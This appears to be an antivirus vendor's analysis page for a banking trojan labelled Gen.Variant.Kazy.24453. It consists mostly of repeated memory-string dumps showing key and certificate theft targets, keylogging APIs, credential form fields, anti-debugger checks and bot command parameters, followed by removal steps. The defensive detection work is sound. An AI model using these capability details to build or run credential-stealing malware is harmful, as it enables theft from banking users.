
%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

SYSTEM!WINUK0FFOO83I6!427963A6

C:\Windows\apppatch\pcqovw.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

`.data

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

conhost.exe_3700_rwx_01510000_000B4000:

.text

`.data

.reloc

`.rdata

@.data

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

conhost.exe_3700_rwx_02290000_000BA000:

.text

`.rdata

@.data

.reloc

<>http

PASSu98V

PASSu08V

FTPQ

Bve.Bv|

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

ADM!WINUK0FFOO83I6!427963A6

C:\Windows\apppatch\pcqovw.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

`.data

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:2960
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Windows\AppPatch\pcqovw.exe (1963 bytes)
C:\Windows\System32\config\SOFTWARE.LOG1 (4529 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Kazy.24453_117d755a61

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Kazy.24453_117d755a61

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet